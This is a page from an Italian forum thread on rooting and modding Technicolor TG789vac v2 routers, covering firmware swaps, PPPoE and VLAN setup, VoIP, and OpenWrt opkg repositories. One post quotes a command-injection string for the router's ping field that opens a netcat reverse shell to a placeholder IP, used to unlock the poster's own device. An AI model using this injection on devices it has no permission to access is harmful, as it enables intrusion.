[GUIDA] Flash, Root e Modding Technicolor TG789vac v2 (VANT-6)

• 4738 Risposte
  • 2436907 Visite

Offline renpasa

• Membro Anziano
  • 114
Re:[GUIDA] TG789vac v2 iiNET/UNO Flash, Sblocco e Modding
« Risposta #195 il: 22 Marzo 2018, 17:17 »
Hai riportato l' IP del tuo pc all'impostazione originale? quella che avevi prima di usare TFTP intendo.

@A chi interessa metto questo link, lo considero interessante e ci sono ulteriori link altrettanto interessanti. E' tutto in inglese ma c'è sempre Google translator:)
Magari ho scoperto l'acqua calda ma a me fa molto comodo.
https://forums.whirlpool.net.au/forum-replies.cfm?t=2650998&p=4

Offline crazyTauron

• Nuovo Iscritto
  • *
  • 10
« Risposta #196 il: 22 Marzo 2018, 18:17 »
Si si ho rimesso tutto automatico. Anche il ping dal router all'esterno non funziona, il router cmq riesce a collegarsi al dslam, infatti mi da i valori della portante, ma sembra non riuscire ad andare oltre quindi il problema dovrebbe stare nelle credenziali(user corretta, ho controllato nello user.ini del mio TG788 mentre la password dovrebbe essere giusta visto che tiscali ne fornisce solo una per tutti i servizi) o in qualche configurazione della sezione internet.

Offline nykoinside

• Nuovo Iscritto
  • *
  • 5
« Risposta #197 il: 22 Marzo 2018, 18:41 »
Per quanto riguarda il ritorno al FW TIM, il mio dubbio derivava appunto da questo post https://www.ilpuntotecnico.com/forum/index.php/topic,77071.msg216027.html#msg216027, secondo cui il FW iiNet sovrascrive qualche componente del boot che non è compreso negli AGTOT, solo che non è mai stato confermato da nessun altro (o me lo sono perso).

@^NiCo^ Nel repo di Ansuel sembra ci sia una vecchia versione 1.6 "senza bootloader", non è che per caso avevi montato quella quando sei tornato al tim?

@crazyTauron nello screenshot qui sopra mi sembra che la linea sia configurata male, non ho questo firmware e non conosco così tanto bene l'interfaccia... Hai impostato la connessione come PPPoE e attivato il VLAN ID con valore 835?
« Ultima modifica: 22 Marzo 2018, 19:07 da nykoinside »

Offline crazyTauron

• Nuovo Iscritto
  • *
  • 10
« Risposta #198 il: 22 Marzo 2018, 20:53 »
@nykoinside si son stato un po' nabbo XD era proprio quello il problema. Ora passo alla parte voip XD Ho già la password ma è cryptata vediamo se riesco a usarla cmq XD

Offline ^NiCo^

• Ex-Staff
  • Esperto
  • 1258
  • Se non và dagli un calcio e riprova.
« Risposta #199 il: 22 Marzo 2018, 22:50 »
Se intendi questo fw -> https://repository.ilpuntotecnico.com/files/Ansuel/AGTOT/IInet%20senza%20bootloader/
non l' ho mai toccato, quando sono tornato a tim ho usato AGTOT_1.0.6_CLOSED.rbi ed avevo iiNET 2.2.1 su.

Offline anburg

• Nuovo Iscritto
  • *
  • 27
« Risposta #200 il: 24 Marzo 2018, 11:34 »
@nico ma sei riuscito a flashare TIM sopra iinet??? oppure ci sei riuscito tempo fa ed adesso non piu'?
se il problema, come scrive nykoinside due post sopra, è il bootloader sovrascritto parzialmente o completamente come si risolve?
io sto usando iinet2.2.1 in bridge con pfsense (pppe) ma vorrei provare con il firm TIM
ho un'altro scolapasta con il TIM 1.0.6 sbloccato ma quello non lo tocco
saluti A

Offline crazyTauron

• Nuovo Iscritto
  • *
  • 10
« Risposta #201 il: 24 Marzo 2018, 13:05 »
Allora ragazzi piccolo problema. Stavo provando a far funzionare opkg ma mi dava un po' di problemi, all'inizio non trovava i repositiry perchè hanno cambiato indirizzo poi nonostante l'abbia configurati con i reposity giusti mi diceva che i pacchetti non erano per quell'architettura(Brmc63xx), quindi ho provato a passare alla versione 3 di iinet ma qua sono arrivati i problemi grossi. Ho provato la procedura di sblocco ma una volta inserito nel campo PING la stringa ":::::::;nc a.b.c.d 1337 -e /bin/sh"(naturalmente sostituivo a.b.c.d. con il mio ip) mi dava l'errore "Invalid IP address Label within domain name has invalid syntax", pensando fosse problema di versione ho flashato tutto e sono tornato alla 2.2.1, carico la vecchia configurazione e provo a sbloccarlo ma stesso errore di prima. Non capisco dove possa essere l'errore, la prima volta andò tutto liscio.

P.S.Con la versione 3 quando provavo con Putty a collegarmi mi diceva connessione rifiutata mentre ora con la versione 2.2.1 mi fa inserire user e pass ma mi da Accesso negato, password sbagliata.

P.P.S. è possibile recuperare il firmware tiscali?

EDIT: Risolto il problema dell'accesso SSH facendo un downgrade alla 2.0.5 e poi di nuovo un upgrade alla 2.2.1. Ora cerco di trovare dei repository per opkg che non diano problemi di architettura.
« Ultima modifica: 24 Marzo 2018, 18:51 da crazyTauron »

Offline matteone2

• Membro Anziano
  • 136

Offline LuKePicci

• Global Moderator
  • VIP
  • 2789
« Risposta #203 il: 26 Marzo 2018, 01:56 »
Io uso tranquillamente i repository generici per brcm63xx  openwrt 15.05.1 che funzionano perfettamente per la maggior parte di quello che serve. Mi è bastato aggiungerli con
Codice: [Seleziona]
echo "src/gz chaos_calmer_base http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/base" >> /etc/opkg.conf
echo "src/gz chaos_calmer_packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/packages" >> /etc/opkg.conf
echo "src/gz chaos_calmer_luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/luci" >> /etc/opkg.conf
echo "src/gz chaos_calmer_routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/routing" >> /etc/opkg.conf
echo "src/gz chaos_calmer_telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/telephony" >> /etc/opkg.conf
echo "src/gz chaos_calmer_management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/management" >> /etc/opkg.conf

Potete anche usare il target 'smp' invece di generic ma non tutti i pacchetti sono disponibili in quelle repo.

e poi fare un normalissimo
Codice: [Seleziona]
opkg --add-arch brcm63xx:8 update
opkg --force-depends --add-arch brcm63xx:8 install <PACCHETTO>

Per cose base tipo nano e htop che non ha senso ricompilare mi sembra più pulito come approccio.
« Ultima modifica: 21 Giugno 2018, 13:13 da LuKePicci »

Offline crazyTauron

• Nuovo Iscritto
  • *
  • 10
« Risposta #204 il: 26 Marzo 2018, 11:17 »
@LuKePicci good, come hai fatto senza farti dare la sfilza di "no valid architecture" quando fai "opkg update"? Cmq con quei repository non mi trovava i pacchetti :( Alla fine ho risolto con i repository che ha messo freddy, naturalmente uppati su un altro server perchè mettere lettere accentate in un URL è da poco di buono.

Offline nicsil

• Nuovo Iscritto
  • *
  • 15
« Risposta #205 il: 26 Marzo 2018, 15:15 »
webGUI alternative da installare su iinet ce ne sono? Ne ho visti alcuni per altri modem mi chiedevo se ce ne fossero anche per AGTOT :)

Offline LuKePicci

• Global Moderator
  • VIP
  • 2789
« Risposta #206 il: 27 Marzo 2018, 16:24 »
@crazyTauron Si scusa, devi mettere quell'--add-arch anche nel comando di update

Offline marcofrax

• Nuovo Iscritto
  • *
  • 30
« Risposta #207 il: 27 Marzo 2018, 16:47 »
Non mi è chiaro se seguendo la procedura in prima pagina mi sarà poi possibile utilizzare il router con tiscali mantenendo anche la fonia.

Offline crazyTauron

• Nuovo Iscritto
  • *
  • 10
« Risposta #208 il: 27 Marzo 2018, 17:02 »
@marcofrax Seguendo la guida non avrai più il firmware tiscali quindi niente più fonia se non hai le credenziali per il voip. Le credenziali del voip sono diverse da quelle per l'accesso a internet quindi se si tratta del tuo router principale evita di farlo :D
Naturalmente se hai già le credenziali puoi configurare il router per usare il voip. Se ti servono i dati per configurarlo chiedi pure, ora il mio router è spento e non posso passarteli ma se ti servono lo riaccendo

Grazie @LuKePicci
« Ultima modifica: 27 Marzo 2018, 17:06 da crazyTauron »

Offline marcofrax

• Nuovo Iscritto
  • *
  • 30
« Risposta #209 il: 27 Marzo 2018, 17:06 »
@crazyTauron come temevo, la stessa menata di vodafone.
Tirerò su la pppoe da altro router, limitando il TG al lato fonia.
« Ultima modifica: 27 Marzo 2018, 17:37 da marcofrax »